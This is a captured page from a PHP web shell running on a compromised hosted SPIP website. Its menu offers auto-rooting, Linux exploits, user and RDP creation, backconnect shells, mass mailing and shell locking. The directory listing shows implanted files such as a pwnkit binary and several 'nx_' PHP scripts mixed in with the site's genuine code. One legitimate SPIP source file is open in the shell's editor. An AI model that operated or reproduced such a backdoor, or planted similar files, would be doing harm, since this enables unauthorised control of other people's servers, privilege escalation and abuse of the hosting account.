Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
ecrire /
public /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
Nx_.php
399
B
-rw-rw-rw-
admin.php
2.04
KB
-rw----r--
aiguiller.php
11.59
KB
-rw----r--
assembler.php
25.09
KB
-rw----r--
balises.php
76.06
KB
-rw----r--
boucles.php
3.34
KB
-rw----r--
cacher.php
13.75
KB
-rw----r--
compiler.php
48.79
KB
-rw----r--
composer.php
32.05
KB
-rw----r--
criteres.php
100.89
KB
-rw----r--
debusquer.php
26.84
KB
-rw----r--
decompiler.php
6.3
KB
-rw----r--
evaluer_page.php
2.57
KB
-rw----r--
fonctions.php
20.62
KB
-rw----r--
format_html.php
3.89
KB
-rw----r--
img_cache.php
702
B
-rw-rw-rw-
index.php
2
B
-rw----r--
interfaces.php
6.17
KB
-rw----r--
jointures.php
20.61
KB
-rw----r--
normaliser.php
5.36
KB
-rw----r--
nx_patch.php
523
B
-rw-rw-rw-
nx_probe.php
1.45
KB
-rw-rw-rw-
parametrer.php
10.31
KB
-rw----r--
phraser_html.php
40.03
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
quete.php
19.87
KB
-rw----r--
references.php
32.04
KB
-rw----r--
sandbox.php
7.56
KB
-rw----r--
sitemange.php
4.14
KB
-rw-rw-rw-
styliser.php
5.78
KB
-rw----r--
styliser_par_z.php
13.12
KB
-rw----r--
tracer.php
5.94
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : interfaces.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ /** * Définition des noeuds de l'arbre de syntaxe abstraite * * @package SPIP\Core\Compilateur\AST **/ if (!defined('_ECRIRE_INC_VERSION')) { return; } global $table_criteres_infixes; $table_criteres_infixes = ['<', '>', '<=', '>=', '==', '===', '!=', '!==', '<>', '?']; global $exception_des_connect; $exception_des_connect[] = ''; // ne pas transmettre le connect='' par les inclure /** @deprecated 4.2 Uses nampespaced classes */ class_alias('Spip\\Compilateur\\Noeud\\Boucle', 'Boucle'); class_alias('Spip\\Compilateur\\Noeud\\Champ', 'Champ'); class_alias('Spip\\Compilateur\\Noeud\\Contexte', 'Contexte'); class_alias('Spip\\Compilateur\\Noeud\\Critere', 'Critere'); class_alias('Spip\\Compilateur\\Noeud\\Idiome', 'Idiome'); class_alias('Spip\\Compilateur\\Noeud\\Polyglotte', 'Polyglotte'); class_alias('Spip\\Compilateur\\Noeud\\Texte', 'Texte'); /** * Déclarer les interfaces de la base pour le compilateur * * On utilise une fonction qui initialise les valeurs, * sans écraser d'eventuelles prédéfinition dans mes_options * et les envoie dans un pipeline * pour les plugins * * @return void */ function declarer_interfaces() { $GLOBALS['table_des_tables']['articles'] = 'articles'; $GLOBALS['table_des_tables']['auteurs'] = 'auteurs'; $GLOBALS['table_des_tables']['rubriques'] = 'rubriques'; $GLOBALS['table_des_tables']['hierarchie'] = 'rubriques'; // definition des statuts de publication $GLOBALS['table_statut'] = []; // // tableau des tables de jointures // Ex: gestion du critere {id_mot} dans la boucle(ARTICLES) $GLOBALS['tables_jointures'] = []; $GLOBALS['tables_jointures']['spip_jobs'][] = 'jobs_liens'; // $GLOBALS['exceptions_des_jointures']['titre_mot'] = array('spip_mots', 'titre'); // pour exemple $GLOBALS['exceptions_des_jointures']['profondeur'] = ['spip_rubriques', 'profondeur']; if (!defined('_TRAITEMENT_TYPO')) { define('_TRAITEMENT_TYPO', 'typo(%s, "TYPO", $connect, $Pile[0])'); } if (!defined('_TRAITEMENT_RACCOURCIS')) { define('_TRAITEMENT_RACCOURCIS', 'propre(%s, $connect, $Pile[0])'); } if (!defined('_TRAITEMENT_TYPO_SANS_NUMERO')) { define('_TRAITEMENT_TYPO_SANS_NUMERO', 'supprimer_numero(typo(%s, "TYPO", $connect, $Pile[0]))'); } $GLOBALS['table_des_traitements']['BIO'][] = 'safehtml(' . _TRAITEMENT_RACCOURCIS . ')'; $GLOBALS['table_des_traitements']['NOM_SITE']['auteurs'] = 'entites_html(%s)'; $GLOBALS['table_des_traitements']['NOM']['auteurs'] = 'safehtml(' . _TRAITEMENT_TYPO_SANS_NUMERO . ')'; $GLOBALS['table_des_traitements']['CHAPO'][] = _TRAITEMENT_RACCOURCIS; $GLOBALS['table_des_traitements']['DATE'][] = 'normaliser_date(%s)'; $GLOBALS['table_des_traitements']['DATE_REDAC'][] = 'normaliser_date(%s)'; $GLOBALS['table_des_traitements']['DATE_MODIF'][] = 'normaliser_date(%s)'; $GLOBALS['table_des_traitements']['DATE_NOUVEAUTES'][] = 'normaliser_date(%s)'; $GLOBALS['table_des_traitements']['DESCRIPTIF'][] = _TRAITEMENT_RACCOURCIS; $GLOBALS['table_des_traitements']['INTRODUCTION'][] = _TRAITEMENT_RACCOURCIS; $GLOBALS['table_des_traitements']['NOM_SITE_SPIP'][] = _TRAITEMENT_TYPO; $GLOBALS['table_des_traitements']['NOM'][] = _TRAITEMENT_TYPO_SANS_NUMERO; $GLOBALS['table_des_traitements']['AUTEUR'][] = _TRAITEMENT_TYPO; $GLOBALS['table_des_traitements']['PS'][] = _TRAITEMENT_RACCOURCIS; $GLOBALS['table_des_traitements']['SOURCE'][] = _TRAITEMENT_TYPO; $GLOBALS['table_des_traitements']['SOUSTITRE'][] = _TRAITEMENT_TYPO; $GLOBALS['table_des_traitements']['SURTITRE'][] = _TRAITEMENT_TYPO; $GLOBALS['table_des_traitements']['TAGS'][] = '%s'; $GLOBALS['table_des_traitements']['TEXTE'][] = _TRAITEMENT_RACCOURCIS; $GLOBALS['table_des_traitements']['TITRE'][] = _TRAITEMENT_TYPO_SANS_NUMERO; $GLOBALS['table_des_traitements']['TYPE'][] = _TRAITEMENT_TYPO; $GLOBALS['table_des_traitements']['DESCRIPTIF_SITE_SPIP'][] = _TRAITEMENT_RACCOURCIS; $GLOBALS['table_des_traitements']['SLOGAN_SITE_SPIP'][] = _TRAITEMENT_TYPO; $GLOBALS['table_des_traitements']['ENV'][] = 'entites_html(%s,true)'; // valeur par defaut pour les balises non listees ci-dessus $GLOBALS['table_des_traitements']['*'][] = false; // pas de traitement, mais permet au compilo de trouver la declaration suivante // toujours securiser les DATA $GLOBALS['table_des_traitements']['*']['DATA'] = 'safehtml(%s)'; // expliciter pour VALEUR qui est un champ calcule et ne sera pas protege par le catch-all * $GLOBALS['table_des_traitements']['VALEUR']['DATA'] = 'safehtml(%s)'; // gerer l'affectation en 2 temps car si le pipe n'est pas encore declare, on ecrase les globales $interfaces = pipeline( 'declarer_tables_interfaces', [ 'table_des_tables' => $GLOBALS['table_des_tables'], 'exceptions_des_tables' => $GLOBALS['exceptions_des_tables'], 'table_date' => $GLOBALS['table_date'], 'table_titre' => $GLOBALS['table_titre'], 'tables_jointures' => $GLOBALS['tables_jointures'], 'exceptions_des_jointures' => $GLOBALS['exceptions_des_jointures'], 'table_des_traitements' => $GLOBALS['table_des_traitements'], 'table_statut' => $GLOBALS['table_statut'], ] ); if ($interfaces) { $GLOBALS['table_des_tables'] = $interfaces['table_des_tables']; $GLOBALS['exceptions_des_tables'] = $interfaces['exceptions_des_tables']; $GLOBALS['table_date'] = $interfaces['table_date']; $GLOBALS['table_titre'] = $interfaces['table_titre']; $GLOBALS['tables_jointures'] = $interfaces['tables_jointures']; $GLOBALS['exceptions_des_jointures'] = $interfaces['exceptions_des_jointures']; $GLOBALS['table_des_traitements'] = $interfaces['table_des_traitements']; $GLOBALS['table_statut'] = $interfaces['table_statut']; } } declarer_interfaces();
Close